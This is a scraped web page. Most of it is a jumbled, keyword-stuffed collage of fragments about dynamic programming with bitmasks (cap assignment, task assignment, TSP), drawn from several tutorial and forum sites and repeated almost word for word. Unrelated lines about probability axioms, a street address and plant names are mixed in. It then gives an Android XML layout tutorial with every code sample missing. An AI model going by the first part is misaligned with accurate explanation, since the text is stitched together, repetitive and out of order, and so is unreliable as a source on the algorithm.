algorithms, and … We strongly recommend you to minimize your browser and try this yourself first. . Can I add this algorithm? To iterate over all the subsets we are going to each number from 0 to 2set_size-1 close, link no subject will be left unassigned. Bitmasking DP rarely appears in weekly contests. How is this problem solved using Bitmasking + DP? Mask in Bitmask means hiding something. Let us first introduce Bitmasking. Don't stop learning now. You will learn the basics of writing a Dynamic Programming Solution and how to find time complexity of these solutions. performing the shortest_path algorithm with the help of bitmasking and dynamic programming, by coding out a function. Usually, the state of DP can use limited variables to represent such as dp[i], dp[i][j], dp[i][j][k]. Usually, the state of DP can use limited variables to represent such as dp[i], dp[i][j], dp[i][j][k]. Algorithm is given below: Let's try to improve it using dynamic programming. So, count the total number of arrangements or ways such that none of them is wearing the same type of cap. As in, for every possible configuration of numbers to be added together, there will be one position in the results array. Programming competitions and contests, programming community. Step - 2 - Performing The Shortest Path Algorithm using Dynamic Programming and Bitmasking. ****1194 - Colored T-Shirts( dp+bitmasking) ( minimum no of swaps needed to sort array ) Apr 17th **1158 - Anagram Division(BITMASKING + REMOVAL OF RECOUNTING ) Given a string s and a positive integer d you have to determine how many permutations of s are divisible by d. For each i,j (1≤i,j≤N), the compatibility of Man i and Woman j is given as an integer ai,j. Explanation - Yes.. it can be solved using DP+bitmasking. Our main methodology is to assign a value to each mask (and, therefore, to each subset) and thus calculate the values for new masks using values of the already computed masks. We can represent any subset of $$A$$ using a bitmask of length $$5$$, with an assumption that if $$i^{th} ( 0 \le i \le 4)$$ bit is set then it means $$i^{th}$$ element is present in subset. We can set the $$i^{th}$$ bit, unset the $$i^{th}$$ bit, check if $$i^{th}$$ bit is set in just one step each. First thing to make sure before using bitmasks for solving a problem is that it must be having small constraints, as solutions which use bitmasking generally take up exponential time and memory. Each person has his own collection of T-Shirts. The brute force approach here is to try every possible assignment. Prerequisites - DP with bitmask. dmorgans: 2020-02-18 19:14:33. my 51st DP+bitmask, use long long. Since we want to access all persons that can wear a given cap, we use an array of vectors, capList[101]. . Now, let's take another problem that uses dynamic programming along with bitmasks. But the optimal solution to this problem using DP with Bit Masking. Bitmasking and DP added #705 poyea merged 1 commit into TheAlgorithms : master from adMenon : master Mar 27, 2019 Conversation 2 Commits 1 Checks 0 Files changed We mostly use the following notations/operations on masks: Also, there are ‘n’ persons each having a collection of a variable number of caps. Little Elephant and his friends are going to a party. set(i, mask) – set the ith bit in the mask But I found none of them explaining all the concepts related to the topic. . ekesh: 2020-04-27 22:53:49. First, we will learn about bitmasking and dynamic programming then we will solve a problem related to it that will solve your queries related to the implementation. By CurbStomp, 6 years ago, Hi everyone!!! The sum of the probabilities of all atomic events is 1. I am assuming you know the basics of DP and you have solved few DPs using recursion. We will consider a number of examples to help you understand better. 0 or 1). While still intractable, the runtime is significantly better. Writing code in comment? Competitive-Programming-Problems / FRIENDS AT CODING BLOCKS - BITMASKING - DP - HACKERBLOCKS.cpp Go to file Go to file T; Go to line L; Copy path Cannot retrieve contributors at this time. The following problems will be discussed. Kolmogorov’s axioms of probability The probability P(A) of an event A is a nonnegative real number. Bitmask also known as mask is a sequence of N -bits that encode the subset of our collection. hellb0y_suru: 2020-03-22 20:52:20. So we can use an integer variable as a bitmask to store which person is wearing a cap and which is not. What is bitmasking? Posts about Bitmasking written by Vishal. I loved solving it. We are also given a matrix $$cost$$ of size $$N \times N$$, where $$cost[i][j]$$ denotes, how much person $$i$$ is going to charge for task $$j$$. I will also give my solution to this problem at the end of this tutorial. For the bit part, everything is encoded as a single bit, so the whole state can be encoded as a group of bits, i.e. Bit manipulation is the act of algorithmically manipulating bits or other pieces of data shorter than a word. Github Repo (all code available here): https://github.com/himansingh241/TheC... Code: Do subscribe and hit the like button if the video was helpful for you. A table dp [] [] is used such that in every entry dp [i] [j], i is mask and j is cap number. [citation, download] It contains lots of preliminary analysis and at least the DP approaches described in 1. and 5. of your post. I have been trying to find out some good tutorials on DP with Bitmasks. So the bitmask $$01010$$ represents the subset $$\{2, 4\}$$. Now, suppose, we have $$answer(k, mask)$$, we can assign a task $$i$$ to person $$k$$, iff $$i^{th}$$ task is not yet assigned to any peron i.e. Kartik … Codeforces. The input constraints are wrong. Bitmasking is something related to bit and mask. I managed to find this one and another one. Set the $$i^{th}$$ bit: $$b | (1 \lt\lt i)$$. Dead Wind Cavern Or Quarry Junction, Material Science Research Groups, Lion Pride Takeover, Peninsula Golf Tee Times, Case Reports In Cardiology, Dietes Iridioides And Grandiflora, What Eats Herons, "/>
Street Wilfredo García Reyes Encarnación #5, Santo Domingo, Dominican Republic
. a binary number. Step-1 - Finding Adjacent Matrix Of the Graph. We will take minimum of all these answers as our final output. Since, number of ways could be large, so output modulo 1000000007. There are 100 different kind of T-Shirts. Now the benefit of using bitmask. If we draw the complete recursion tree, we can observe that many subproblems are solved again and again. . More related articles in Dynamic Programming, We use cookies to ensure you have the best browsing experience on our website. First thing to make sure before using bitmasks for solving a problem is that it must be having small constraints, as solutions which use bitmasking generally take up exponential time and memory. Suppose the state of $$dp$$ is $$(k, mask)$$, where $$k$$ represents that person $$0$$ to $$k-1$$ have been assigned a task, and $$mask$$ is a binary number, whose $$i^{th}$$ bit represents if the $$i^{th}$$ task has been assigned or not. Note that the only difference here is that in this case the number of subjects and students are equal.So we are sure that each student will be assigned exactly one subject i.e. Let's take an example. (1 \lt\lt i) = 11101$01010 \& 11101 = 01000$$Now the subset does not include the$$1^{st}$$element, so the subset is$$\{4\}$$. DP with bitmasking with state reduction. Little Elephant and his friends are going to a party. By using our site, you Mask in Bitmask means hiding something. Note that each task is to be alloted to a single person, and each person will be alloted only one task. However, sometimes, the states of a DP problem may contain multiple statuses. Unset the$$i^{th}$$bit:$$b \& ! first(mask) – the number of the lowest non-zero bit in the mask Suppose we have a collection of elements which are numbered from 1 to N. If we want to represent a subset of this set then it can be encoded by a sequence of N bits (we usually call this sequence a “mask”). . Loading... Unsubscribe from Kartik Arora? Bitmask is nothing but a binary number that represents something. The element of the mask can be either set or not set (i.e. Read statement on Codechef. . Codeforces. $$answer(mask|(1 \lt\lt i)) = min(answer(mask|(1 \lt\lt i)), answer(mask)+cost[x][i])$$$ count(mask) – the number of non-zero bits in the mask 1 2 2 10 1,024 3,628,800 20 1,048,576 2,432,902,008,176,640,000. (1 \lt\lt i)$$. Bitmasking and Dynamic Programming | Set 1 (Count ways to assign unique cap to every person), Bitmasking and Dynamic Programming | Set-2 (TSP), Finding sum of digits of a number until sum becomes single digit, Program for Sum of the digits of a given number, Compute sum of digits in all numbers from 1 to n, Count possible ways to construct buildings, Maximum profit by buying and selling a share at most twice, Maximum profit by buying and selling a share at most k times, Maximum difference between two elements such that larger element appears after the smaller number, Given an array arr[], find the maximum j – i such that arr[j] > arr[i], Sliding Window Maximum (Maximum of all subarrays of size k), Sliding Window Maximum (Maximum of all subarrays of size k) using stack in O(n) time, Next greater element in same order as input, Maximum product of indexes of next greater on left and right, Number of Unique BST with a given key | Dynamic Programming, Travelling Salesman Problem | Set 1 (Naive and Dynamic Programming), Compute nCr % p | Set 1 (Introduction and Dynamic Programming Solution), Vertex Cover Problem | Set 2 (Dynamic Programming Solution for Tree), Dynamic Programming vs Divide-and-Conquer, Dynamic Programming | Wildcard Pattern Matching | Linear Time and Constant Space, Counting pairs when a person can form pair with at most one, Number of distinct ways to represent a number as sum of K unique primes, Dynamic Programming | High-effort vs. Low-effort Tasks Problem, Top 20 Dynamic Programming Interview Questions, Distinct palindromic sub-strings of the given string using Dynamic Programming, Convert N to M with given operations using dynamic programming, Maximum weight transformation of a given string, Write Interview There are 100 different types of caps each having a unique id from 1 to 100. It is basically a Backtracking based solution. Since we want to access all persons that can wear a given cap, we use an array of vectors, capList. A value capList [i] indicates the list of persons that can wear cap i. Let's first try to understand what Bitmask means. We care about your data privacy.$$mask\&(1 \lt\lt i) = 0$$then,$$answer(k+1, mask|(1 \lt\lt i)$$will be given as: Let's say the bitmask,$$b = 01010$$. In this case, we can think about using the state compression approaches to represent the DP state. Assignment Problem: In our chosen subset the i-th element belongs to it if and only if the i-th bit of the mask is set i.e., it equals to 1. HackerEarth uses the information that you provide to contact you about relevant content, products, and services. ****1194 - Colored T-Shirts( dp+bitmasking) ( minimum no of swaps needed to sort array ) Apr 17th **1158 - Anagram Division(BITMASKING + REMOVAL OF RECOUNTING ) Given a string s and a positive integer d you have to determine how many permutations of s are divisible by d. Codeforces. Experience. Now we need to assign each task to a person in such a way that the total cost is minimum. 2) 2 days Bitmasking comes in very handy in dynamic programming problems when we have to deal with subsets and the list/array size is small. Very good question. Introduction Probability, combinatorics, and bitmasking appear commonly in dynamic programming problems. Each person has his … brightness_4 Let$$ i = 3$(1 \lt\lt i) = 01000$01010 \& 01000 = 01000$$maskmanlucifer: 2020-04-05 04:35:52. nice question for beginners. Clearly the result is non-zero, so that means$$3^{rd}$$element is present in the subset. You can do a bitmask DP whenever you feel "To solve a sub problem, I need the previously visited positions/indices". In this course, you will learn about the famous optimisation technique of Dynamic Programming. I was able to solve the problem by assuming n <= 20. an09mous: 2020-04-14 13:28:54. Before diving into solution, Let's first try to understand what Bitmask means. code, This article is contributed by Gaurav Ahirwar. acknowledge that you have read and understood our, GATE CS Original Papers and Official Keys, ISRO CS Original Papers and Official Keys, ISRO CS Syllabus for Scientist/Engineer Exam, Optimal Substructure Property in Dynamic Programming | DP-2, Overlapping Subproblems Property in Dynamic Programming | DP-1. Let$$i=1$$, so,$$$(1 \lt\lt i) = 00010$! → Pay attention Before contest Codeforces Round #670 (Div. There are N men and N women, both numbered 1,2,…,N . Also, We sometimes, start with the empty subset X and we add elements in every possible way and use the values of obtained subsets X’1, X’2… ,X’k to compute the value/solution for X. What is Bitmasking? check(i, mask) – check the ith bit in the mask. Start by picking the first element from the first set, marking it as visited and recur for remaining sets. So the dp state now is just $$(mask)$$, and if we have $$answer(mask)$$, then. Let's first try to understand what Bitmask means. In this case, we can think about using the state compression approaches to represent the DP state. Please write to us at contribute@geeksforgeeks.org to report any issue with the above content. Programming competitions and contests, programming community. This series of videos are focused on explaining dynamic programming by illustrating the application of DP with bitmasking through the use of selected problems from platforms like Codeforces, Codechef, SPOJ, CSES and Atcoder. H ello World! For example, the mask 10000101 means that the subset of the set [1… 8] consists of elements 1, 3 and 8. Aug 20, 2017 . | page 1 The most important step in designing the core algorithm is this one, let's have a look at the pseudocode of the algorithm below. . Below is the implementation of above idea. In this webinar, we are going to learn advanced dynamic programming using Bitmasking. Dynamic Programming with Bitmasks LIVE Webinar [Hinglish] - by Prateek Narang, Coding Blocks . We know that for a set of N elements there are total 2N subsets thus 2N masks are possible, one representing each subset. You will need a two dimensional array for getting the Adjacent Matrix of the given graph. If you are new to bitmasking have a look at this post.This question is very similar to the question in the above mentioned post. Little Elephant and T-Shirts Problem Statement. The following problems will be discussed. Memoization would also give AC with 1-d DP. First, we will learn about bitmasking and dynamic programming then we will solve a problem related to it that will solve your queries related to the implementation. They test cases in which n > 12. There are $$N$$ persons and $$N$$ tasks, each task is to be alloted to a single person. Introduction Probability, combinatorics, and bitmasking appear commonly in ... Bitmasking is a compact and e cient way to represent sets as the bits in an integer. A bit mask is a binary number or a bitmap where the desired bit(s) are one and the remaining 0. Before solving the problem, we assume that the reader has the knowledge of here $$x =$$number of set bits in $$mask$$. . Get hold of all the important DSA concepts with the DSA Self Paced Course at a student-friendly price and become industry ready. A Simple Solution is to try all possible combinations. We will be considering a small example and try … Bitmasking and DP is a method used for solving questions like assign unique caps among persons, etc. Complete reference to competitive programming. . *has extra registration In most cases, 1 stands for the valid state while 0 stands for the invalid state. This means that the values for X’i must have been computed already, so we need to establish an ordering in which masks will be considered. This question requires the use of dp + bitmasking.. . It’s easy to see that the natural ordering will do: go over masks in increasing order of corresponding numbers. The idea is to use the fact that there are upto 10 persons. Computer programming tasks that require bit manipulation include low-level device control, error detection and correction algorithms, data compression, encryption algorithms, and … We strongly recommend you to minimize your browser and try this yourself first. . Can I add this algorithm? To iterate over all the subsets we are going to each number from 0 to 2set_size-1 close, link no subject will be left unassigned. Bitmasking DP rarely appears in weekly contests. How is this problem solved using Bitmasking + DP? Mask in Bitmask means hiding something. Let us first introduce Bitmasking. Don't stop learning now. You will learn the basics of writing a Dynamic Programming Solution and how to find time complexity of these solutions. performing the shortest_path algorithm with the help of bitmasking and dynamic programming, by coding out a function. Usually, the state of DP can use limited variables to represent such as dp[i], dp[i][j], dp[i][j][k]. Usually, the state of DP can use limited variables to represent such as dp[i], dp[i][j], dp[i][j][k]. Algorithm is given below: Let's try to improve it using dynamic programming. So, count the total number of arrangements or ways such that none of them is wearing the same type of cap. As in, for every possible configuration of numbers to be added together, there will be one position in the results array. Programming competitions and contests, programming community. Step - 2 - Performing The Shortest Path Algorithm using Dynamic Programming and Bitmasking. ****1194 - Colored T-Shirts( dp+bitmasking) ( minimum no of swaps needed to sort array ) Apr 17th **1158 - Anagram Division(BITMASKING + REMOVAL OF RECOUNTING ) Given a string s and a positive integer d you have to determine how many permutations of s are divisible by d. For each i,j (1≤i,j≤N), the compatibility of Man i and Woman j is given as an integer ai,j. Explanation - Yes.. it can be solved using DP+bitmasking. Our main methodology is to assign a value to each mask (and, therefore, to each subset) and thus calculate the values for new masks using values of the already computed masks. We can represent any subset of $$A$$ using a bitmask of length $$5$$, with an assumption that if $$i^{th} ( 0 \le i \le 4)$$ bit is set then it means $$i^{th}$$ element is present in subset. We can set the $$i^{th}$$ bit, unset the $$i^{th}$$ bit, check if $$i^{th}$$ bit is set in just one step each. First thing to make sure before using bitmasks for solving a problem is that it must be having small constraints, as solutions which use bitmasking generally take up exponential time and memory. Each person has his own collection of T-Shirts. The brute force approach here is to try every possible assignment. Prerequisites - DP with bitmask. dmorgans: 2020-02-18 19:14:33. my 51st DP+bitmask, use long long. Since we want to access all persons that can wear a given cap, we use an array of vectors, capList[101]. . Now, let's take another problem that uses dynamic programming along with bitmasks. But the optimal solution to this problem using DP with Bit Masking. Bitmasking and DP added #705 poyea merged 1 commit into TheAlgorithms : master from adMenon : master Mar 27, 2019 Conversation 2 Commits 1 Checks 0 Files changed We mostly use the following notations/operations on masks: Also, there are ‘n’ persons each having a collection of a variable number of caps. Little Elephant and his friends are going to a party. set(i, mask) – set the ith bit in the mask But I found none of them explaining all the concepts related to the topic. . ekesh: 2020-04-27 22:53:49. First, we will learn about bitmasking and dynamic programming then we will solve a problem related to it that will solve your queries related to the implementation. By CurbStomp, 6 years ago, Hi everyone!!! The sum of the probabilities of all atomic events is 1. I am assuming you know the basics of DP and you have solved few DPs using recursion. We will consider a number of examples to help you understand better. 0 or 1). While still intractable, the runtime is significantly better. Writing code in comment? Competitive-Programming-Problems / FRIENDS AT CODING BLOCKS - BITMASKING - DP - HACKERBLOCKS.cpp Go to file Go to file T; Go to line L; Copy path Cannot retrieve contributors at this time. The following problems will be discussed. Kolmogorov’s axioms of probability The probability P(A) of an event A is a nonnegative real number. Bitmask also known as mask is a sequence of N -bits that encode the subset of our collection. hellb0y_suru: 2020-03-22 20:52:20. So we can use an integer variable as a bitmask to store which person is wearing a cap and which is not. What is bitmasking? Posts about Bitmasking written by Vishal. I loved solving it. We are also given a matrix $$cost$$ of size $$N \times N$$, where $$cost[i][j]$$ denotes, how much person $$i$$ is going to charge for task $$j$$. I will also give my solution to this problem at the end of this tutorial. For the bit part, everything is encoded as a single bit, so the whole state can be encoded as a group of bits, i.e. Bit manipulation is the act of algorithmically manipulating bits or other pieces of data shorter than a word. Github Repo (all code available here): https://github.com/himansingh241/TheC... Code: Do subscribe and hit the like button if the video was helpful for you. A table dp [] [] is used such that in every entry dp [i] [j], i is mask and j is cap number. [citation, download] It contains lots of preliminary analysis and at least the DP approaches described in 1. and 5. of your post. I have been trying to find out some good tutorials on DP with Bitmasks. So the bitmask $$01010$$ represents the subset $$\{2, 4\}$$. Now, suppose, we have $$answer(k, mask)$$, we can assign a task $$i$$ to person $$k$$, iff $$i^{th}$$ task is not yet assigned to any peron i.e. Kartik … Codeforces. The input constraints are wrong. Bitmasking is something related to bit and mask. I managed to find this one and another one. Set the $$i^{th}$$ bit: $$b | (1 \lt\lt i)$$.
|
|
# Getting Started with XML Layouts
This tutorial will teach you the fundamentals of building Android interface layouts with XML. Read on!
When you’re getting started with developing Android apps using Eclipse and the ADT plugin, Eclipse’s powerful graphical layout editor is a great place to start visually designing your user interface. However, this "what you see is what you get" approach has its limitations, and at some point you'll need to switch to XML.
One of the major benefits of declaring your UI in XML is the ability to keep the UI and the behavior of your app separate, giving you the freedom to tweak your app’s presentation without disrupting its underlying functionality.
In this article, I’ll show you how to design a basic XML layout from scratch, including defining the root element, specifying height and width parameters, and adding some basic UI elements. Finally, I’ll use this basic layout to demonstrate some advanced XML options, such as allocating different amounts of space to different objects, and getting started with string resources.
Note: In Android, XML layouts should be stored in the res/layout directory with the .xml extension.
## Part 1: XML Layout Basics
First, we’ll get used to XML by creating a very basic Android UI that uses the LinearLayout view group to hold a checkbox element. Open the res/layouts/activity_main.xml file and let’s get started.
## Step 1: Specify Your Root Element
The UI must contain a single root element that acts as a visual container for all your other items. The root element can either be a ViewGroup (i.e LinearLayout, ListView, GridView) a merge element or a View, but it must contain the XML namespace. In this example, I’ll be using LinearLayout, a ViewGroup that aligns all children in a specified direction.
A LinearLayout consists of opening and closing XML tags:
In the opening tab, you’ll need to define the XML namespace, which is a standard recommended by the W3C. Defining the XML namespace in Android is easy, simply enter the following code and URL as part of the opening LinearLayout tag:
## Step 2: Width and Height
Next, specify the width and height parameters for your root element. In most instances, you’ll use the "fill_parent" value for the root element, as this instructs it to take up the device’s entire screen.
Enter the following XML for the height/width parameters:
Your XML should now look like this:
## Step 3: Creating a Checkbox
It’s time to add something to that blank canvas! Enter the opening tag for your checkbox. Because this is a UI element, some additional XML is required:
Eclipse uses an integer ID to identify different UI elements within a tree. This should be referenced as a string, using the 'id' attribute and the following syntax:
android:id="@+id/name"
In this example, we’ll refer to this UI element as 'CheckBox:'
2) Width/Height Parameters: wrap_content
Once again, you’ll need to enter the height/width parameters. Setting this attribute to ‘wrap_content’ will display the corresponding item large enough to enclose the content resize. We can re-use the height/width syntax structure from earlier, replacing 'fill_parent' with ‘wrap_content:’
Finally, you’ll need to specify the text that should appear alongside the checkbox. We’ll set the checkbox to display 'Yes':
Your XML should now look like this:
Run your code in the Android Emulator to see your XML in action!
## Part 2: Create Your Second UI with XML
In the second part of this tutorial, we’ll look at some more advanced XML for fine-tuning your UI. We’ll create a layout consisting of two buttons, and then use the 'weight' attribute to change the percentage of layout space allocated to each before briefly covering the basics of string resources.
## Step 1: Create Your Layout
The first step is to create the barebones of your layout. We’ll re-use the LinearLayout root element from the previous example, along with the width/height parameters and, of course, the XML namespace:
## Step 2: Create Your Buttons
To create the first button, add the 'Button' opening tag, and the integer ID using the element name 'button1.'
Set the width and height attributes to ="wrap_content." We’ll be creating a 'Yes' and a 'No' button, so specify 'Yes' as the accompanying text:
Finally, close button1:
Now you have the code for one button, you can easily create another by making a few adjustments:
1) Change the ID to 'button2'
2) Specify that the text should be 'No' (android:text="No")
Your XML should now look like this:
## Step 3: Check the Emulator
To preview how this will look on a real-life Android device, boot up the emulator and take a peek!
## Part 3: Advanced XML Options
Now you have your basic UI, we’ll use some more advanced XML to refine this simple layout.
Set Layout_Weight
The 'android:layout_weight' attribute allows you to specify the size ratio between multiple UI elements. Put simply, the higher the weight value, the greater proportion of allocated space, and the more the UI element expands. If you don’t specify a weight, Eclipse will assume the weight for all items is zero, and divide the available space up equally. The space ratio can be set with the following XML:
In this example, we will assign ‘button1’ with a value of 1, and ‘button2’ with a value of 2.
Note, this is purely an addition; you do not need to change any of the existing code.
The above XML will create two buttons of different sizes:
An Intro to String Resources
A string resource can provide text strings for your application and resource files. In most instances, it’s good practice to store all your strings in the dedicated ‘strings.xml’ folder, which can be found by:
1) Opening the ‘Res’ folder in Eclipse’s project explorer.
2) Opening the ‘Values’ folder.
3) Opening the ‘strings.xml’ file.
To create a new string in your Android project:
1) Open the ‘strings.xml’ file and select ‘Add.’
2)Select ‘String’ from the list and click ‘Ok.’
4) In the right-hand ‘Attributes for string’ menu, enter a name for the string, and a value (Note, the ‘name’ attribute is used to reference the string value, and the string value is the data that will be displayed.)
In this example, we will give the string the name of ‘agree’ and enter the value ‘I agree to the terms and conditions.’
5) Save this new string resource.
6) Open your ‘activity_main.xml’ file. Find the section of code that defines ‘button1’ and change the ‘android:text’ attribute to call this new string resource. Calling a string resource, uses the following syntax:
android:text="@string/name-of-resource"
So, in this example, the code will be:
For ease of viewing the output, delete ‘button2.’ Your code should now look like this:
Check the visual output of your code - the text should have been replaced with the value of your ‘agree’ string.
This is a very basic string, without any additional styling or formatting attributes. If you want to learn more about string resources, the official Android docs are a great source of further information.
## Conclusion
In this article, we’ve covered the XML essentials of creating a root element for your layout and coded a few basic UI elements, before moving onto some more advanced XML that gives you greater control over your UI. You should now be ready to create your own simple user interfaces using XML!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.